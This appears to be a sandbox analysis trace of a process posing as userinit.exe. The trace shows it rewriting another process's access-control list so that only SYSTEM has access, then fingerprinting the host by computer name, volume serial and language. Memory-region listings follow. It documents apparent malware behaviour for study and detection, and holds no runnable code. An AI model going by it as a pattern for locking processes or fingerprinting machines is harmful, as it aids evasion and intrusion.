[0140.503] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x8a4) returned 0x1d0
[0140.503] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.503] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0140.503] GetSecurityInfo () returned 0x0
[0140.506] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.506] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0140.506] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x5d0f28, pControl=0x18e7e2, lpdwRevision=0x18e7dc | out: pControl=0x18e7e2, lpdwRevision=0x18e7dc) returned 1
[0140.506] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.506] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0140.506] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x5d0f28, pOwner=0x18e7d8, lpbOwnerDefaulted=0x18e7cc | out: pOwner=0x18e7d8*=0x0, lpbOwnerDefaulted=0x18e7cc) returned 1
[0140.506] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.506] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0140.506] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x5d0f28, pGroup=0x18e7d8, lpbGroupDefaulted=0x18e7cc | out: pGroup=0x18e7d8*=0x0, lpbGroupDefaulted=0x18e7cc) returned 1
[0140.506] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.506] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0140.507] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x5d0f28, lpbDaclPresent=0x18e7d0, pDacl=0x18e7c4, lpbDaclDefaulted=0x18e7cc | out: lpbDaclPresent=0x18e7d0, pDacl=0x18e7c4, lpbDaclDefaulted=0x18e7cc) returned 1
[0140.507] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.507] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0140.507] IsValidAcl (pAcl=0x5d0f3c) returned 1
[0140.507] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.507] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0140.507] GetAce (in: pAcl=0x5d0f3c, dwAceIndex=0x0, pAce=0x18e664 | out: pAce=0x18e664*=0x5d0f44) returned 1
[0140.507] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acfe74, pSourceSid=0x5d0f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2acfe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.507] IsValidSid (pSid=0x2acfe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.507] ConvertSidToStringSidA () returned 0x1
[0140.507] LocalFree (hMem=0x5d7018) returned 0x0
[0140.507] GetAce (in: pAcl=0x5d0f3c, dwAceIndex=0x1, pAce=0x18e664 | out: pAce=0x18e664*=0x5d0f5c) returned 1
[0140.507] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acff60, pSourceSid=0x5d0f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2acff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.507] IsValidSid (pSid=0x2acff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.507] ConvertSidToStringSidA () returned 0x1
[0140.507] LocalFree (hMem=0x5d7018) returned 0x0
[0140.507] GetAce (in: pAcl=0x5d0f3c, dwAceIndex=0x2, pAce=0x18e664 | out: pAce=0x18e664*=0x5d0f70) returned 1
[0140.507] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2ac29c0, pSourceSid=0x5d0f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2ac29c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0140.507] IsValidSid (pSid=0x2ac29c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0140.507] ConvertSidToStringSidA () returned 0x1
[0140.507] LocalFree (hMem=0x5d7018) returned 0x0
[0140.508] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.508] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0140.508] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5d0f28, lpbSaclPresent=0x18e7d4, pSacl=0x18e7c8, lpbSaclDefaulted=0x18e7cc | out: lpbSaclPresent=0x18e7d4, pSacl=0x18e7c8, lpbSaclDefaulted=0x18e7cc) returned 1
[0140.508] LocalFree (hMem=0x5d0f28) returned 0x0
[0140.508] IsValidSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.508] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.508] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0140.508] GetLengthSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0140.508] GetLastError () returned 0x0
[0140.508] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.508] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0140.508] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.508] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0140.508] InitializeAcl (in: pAcl=0x5d7fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x5d7fa8) returned 1
[0140.508] IsValidSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.508] GetLengthSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0140.508] GetLastError () returned 0x0
[0140.508] IsValidSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.509] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.509] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0140.509] SetLastError (dwErrCode=0x0)
[0140.509] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.509] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0140.509] GetSidSubAuthorityCount (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2acf615
[0140.509] GetLastError () returned 0x0
[0140.509] IsValidSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.509] SetLastError (dwErrCode=0x0)
[0140.509] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.509] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0140.509] GetSidIdentifierAuthority (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2acf616
[0140.509] GetLastError () returned 0x0
[0140.509] IsValidSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.509] IsValidSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.509] SetLastError (dwErrCode=0x0)
[0140.509] GetSidSubAuthorityCount (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2acf615
[0140.509] GetLastError () returned 0x0
[0140.509] SetLastError (dwErrCode=0x0)
[0140.510] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.510] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0140.510] GetSidSubAuthority (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2acf61c
[0140.510] GetLastError () returned 0x0
[0140.510] IsValidSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.510] GetLengthSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0140.510] GetLastError () returned 0x0
[0140.510] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.510] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0140.510] AddAce (in: pAcl=0x5d7fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x5c2f90, nAceListLength=0x14 | out: pAcl=0x5d7fa8) returned 1
[0140.510] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.511] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0140.511] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.511] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0140.511] SetSecurityInfo () returned 0x0
[0140.511] CloseHandle (hObject=0x1d0) returned 1
[0140.511] GetComputerNameA (in: lpBuffer=0x2acfd84, nSize=0x18ea9c | out: lpBuffer="CRH2YWU7", nSize=0x18ea9c) returned 1
[0140.511] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.512] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.512] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.512] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.512] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.512] VirtualAlloc (lpAddress=0x2ad0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2ad0000
[0140.512] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.513] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.513] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.513] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.513] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.513] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.513] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.513] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.513] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.514] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.514] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.514] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.514] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.514] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.514] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.514] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.514] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18ea84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18ea98, lpMaximumComponentLength=0x18ea94, lpFileSystemFlags=0x18ea90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18ea98*=0x90c08a66, lpMaximumComponentLength=0x18ea94*=0xff, lpFileSystemFlags=0x18ea90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0140.515] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.515] GetSystemDefaultLangID () returned 0x5b0409
[0140.515] VerLanguageNameA (in: wLang=0x409, szLang=0x18ea3c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0140.515] ExitProcess (uExitCode=0x0)
Thread:
id = 266
os_tid = 0x884
Thread:
id = 267
os_tid = 0x880
Process:
id = "39"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be7e0"
os_pid = "0x888"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4290
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4291
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4292
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4293
start_va = 0xb0000
end_va = 0xeffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 4294
start_va = 0x200000
end_va = 0x208fff
entry_point = 0x200000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 4295
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 4296
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4297
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4298
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 4299
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 4300
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 4301
start_va = 0x5d0000
end_va = 0x6cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 4302
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4303
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4304
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4305
start_va = 0xf0000
end_va = 0x156fff
entry_point = 0xf0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4306
start_va = 0x320000
end_va = 0x32ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 4307
start_va = 0x6d7b0000
end_va = 0x6d833fff
entry_point = 0x6d7b0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 4308
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 4309
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4310
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4311
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4312
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4313
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4314
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4315
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4316
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4317
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4318
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4319
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 4320
start_va = 0x210000
end_va = 0x2d7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 4321
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4322
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
